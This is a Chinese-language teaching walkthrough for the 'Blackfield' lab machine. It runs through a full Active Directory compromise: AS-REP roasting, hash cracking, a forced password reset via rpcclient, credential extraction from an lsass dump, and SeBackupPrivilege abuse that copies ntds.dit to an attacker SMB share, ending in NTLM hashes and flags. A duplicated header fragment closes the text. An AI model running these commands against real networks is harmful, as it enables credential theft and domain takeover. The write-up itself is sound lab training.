Blackfield域渗透实战教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>
使用Nmap进行端口扫描：<\/p>
nmap -p- 10.10.10.192 --min-rate 1000<\/span> -sC -sV -Pn
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

53\/tcp: DNS服务<\/li>
88\/tcp: Kerberos服务<\/li>
135\/tcp: MSRPC<\/li>
389\/tcp: LDAP<\/li>
445\/tcp: SMB<\/li>
593\/tcp: RPC over HTTP<\/li>
3268\/tcp: LDAP全局目录<\/li>
5985\/tcp: WinRM<\/li>
<\/ul>
1.2 SMB枚举<\/h3>
使用smbmap枚举共享：<\/p>
smbmap -H 10.10.10.192 -u 1<\/span> -r
<\/span><\/span><\/code><\/pre>2. AS-REP Roasting攻击<\/h2>
2.1 获取用户列表<\/h3>
从SMB枚举结果中提取用户名列表，保存到\/tmp\/users.txt<\/p>
2.2 执行AS-REP Roasting<\/h3>
for<\/span> user in $(<\/span>cat \/tmp\/users.txt)<\/span>; do<\/span> 
<\/span><\/span>    impacket-GetNPUsers -no-pass -dc-ip 10.10.10.192 blackfield.local\/$user | grep krb5asrep; 
<\/span><\/span>done<\/span>
<\/span><\/span><\/code><\/pre>2.3 破解哈希<\/h3>
使用hashcat破解获取的AS-REP哈希：<\/p>
hashcat -m 18200<\/span> hash \/usr\/share\/wordlists\/rockyou.txt --force
<\/span><\/span><\/code><\/pre>成功获取凭据：<\/p>

用户名: support<\/li>
密码: #00^BlackKnight<\/li>
<\/ul>
3. 初始访问<\/h2>
3.1 验证凭据<\/h3>
使用crackmapexec验证WinRM访问：<\/p>
crackmapexec winrm 10.10.10.192 -u support -p '#00^BlackKnight'<\/span>
<\/span><\/span><\/code><\/pre>3.2 LDAP查询<\/h3>
执行基本LDAP查询：<\/p>
ldapsearch -H ldap:\/\/10.10.10.192 -x -s base namingcontexts
<\/span><\/span><\/code><\/pre>使用support账户进行详细查询：<\/p>
ldapsearch -H ldap:\/\/10.10.10.192 -b "DC=BLACKFIELD,DC=local"<\/span> -D 'support@blackfield.local'<\/span> -w '#00^BlackKnight'<\/span>
<\/span><\/span><\/code><\/pre>4. BloodHound分析<\/h2>
使用BloodHound.py收集域信息：<\/p>
python3.12 bloodhound.py -c ALL -u support -p '#00^BlackKnight'<\/span> -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192
<\/span><\/span><\/code><\/pre>分析发现：<\/p>

AUDIT2020账户支持强制修改密码<\/li>
<\/ul>
5. 密码重置攻击<\/h2>
5.1 使用rpcclient重置密码<\/h3>
rpcclient -U 'blackfield.local\/support%#00^BlackKnight'<\/span> 10.10.10.192 -c 'setuserinfo2 audit2020 23 "RES@123"'<\/span>
<\/span><\/span><\/code><\/pre>5.2 验证新凭据<\/h3>
crackmapexec winrm 10.10.10.192 -u audit2020 -p 'RES@123'<\/span>
<\/span><\/span><\/code><\/pre>6. 内存取证提取哈希<\/h2>
6.1 访问SMB共享<\/h3>
smbmap -H 10.10.10.192 -u audit2020 -p 'RES@123'<\/span> -r
<\/span><\/span><\/code><\/pre>发现memory_analysis目录中的lsass.zip文件<\/p>
6.2 下载并分析内存转储<\/h3>
smb: \><\/span> cd memory_analysis
<\/span><\/span>smb: \m<\/span>emory_analysis\><\/span> get lsass.zip
<\/span><\/span>unzip lsass.zip
<\/span><\/span>pypykatz lsa minidump lsass.DMP
<\/span><\/span><\/code><\/pre>6.3 使用提取的哈希<\/h3>
获取svc_backup账户的NTLM哈希：<\/p>
9658d1d1dcd9250115e2205d9f48400d
<\/code><\/pre>
使用evil-winrm连接：<\/p>
evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
<\/span><\/span><\/code><\/pre>获取user.txt:<\/p>
3920bb317a0bef51027e2852be64b543
<\/code><\/pre>
7. 权限提升(SeBackupPrivilege)<\/h2>
7.1 检查用户权限<\/h3>
whoami \/priv
<\/span><\/span><\/code><\/pre>确认拥有SeBackupPrivilege权限<\/p>
7.2 使用SeBackupPrivilege工具<\/h3>
上传必要的DLL文件：<\/p>
upload SeBackupPrivilegeCmdLets\/bin\/Debug\/SeBackupPrivilegeCmdLets.dll
<\/span><\/span>upload SeBackupPrivilegeCmdLets\/bin\/Debug\/SeBackupPrivilegeUtils.dll
<\/span><\/span>Import-Module .\SeBackupPrivilegeCmdLets.dll
<\/span><\/span>Import-Module .\SeBackupPrivilegeUtils.dll
<\/span><\/span><\/code><\/pre>7.3 提取ntds.dit和SYSTEM注册表<\/h3>
设置SMB共享：<\/p>
impacket-smbserver share \/tmp\/ -smb2support
<\/span><\/span><\/code><\/pre>从目标系统复制文件：<\/p>
Copy-FileSeBackupPrivilege z:\Windows\ntds\ntds.dit \\10.10.16.9\share\ntds.dit
<\/span><\/span>reg.exe save hklm\system \\10.10.16.9\share\system
<\/span><\/span><\/code><\/pre>7.4 提取域哈希<\/h3>
使用impacket-secretsdump：<\/p>
impacket-secretsdump -system .\/system -ntds .\/ntds.dit LOCAL
<\/span><\/span><\/code><\/pre>获取的哈希包括：<\/p>
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
<\/code><\/pre>
7.5 获取root.txt<\/h3>
4375a629c7c67c8e29db269060c955cb
<\/code><\/pre>
8. 关键知识点总结<\/h2>


AS-REP Roasting<\/strong>: 针对未启用Kerberos预认证的账户的攻击方法<\/p>
<\/li>

密码重置攻击<\/strong>: 利用rpcclient的setuserinfo2功能强制修改用户密码<\/p>
<\/li>

内存取证<\/strong>: 通过分析lsass.exe进程内存转储提取凭证<\/p>
<\/li>

SeBackupPrivilege利用<\/strong>:<\/p>

允许读取系统上的任何文件<\/li>
可用于提取ntds.dit和SYSTEM注册表<\/li>
结合impacket-secretsdump可提取域哈希<\/li>
<\/ul>
<\/li>

域渗透路径<\/strong>:<\/p>

信息收集 → AS-REP Roasting → 密码重置 → 内存取证 → 权限提升 → 域控接管<\/li>
<\/ul>
<\/li>

工具链<\/strong>:<\/p>

Nmap: 初始扫描<\/li>
smbmap: SMB枚举<\/li>
impacket工具集: AS-REP Roasting, secretsdump等<\/li>
BloodHound: 域关系分析<\/li>
pypykatz: 内存凭证提取<\/li>
SeBackupPrivilege工具: 特权利用<\/li>
<\/ul>
<\/li>
<\/ol>
Blackfield域渗透实战教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. AS-REP Roasting攻击<\/h2>

2.1 获取用户列表<\/h3> 从SMB枚举结果中提取用户名列表，保存到\/tmp\/users.txt<\/p>

3. 初始访问<\/h2>

5. 密码重置攻击<\/h2>

6. 内存取证提取哈希<\/h2>

7. 权限提升(SeBackupPrivilege)<\/h2>

2.1 获取用户列表<\/h3>
从SMB枚举结果中提取用户名列表，保存到\/tmp\/users.txt<\/p>
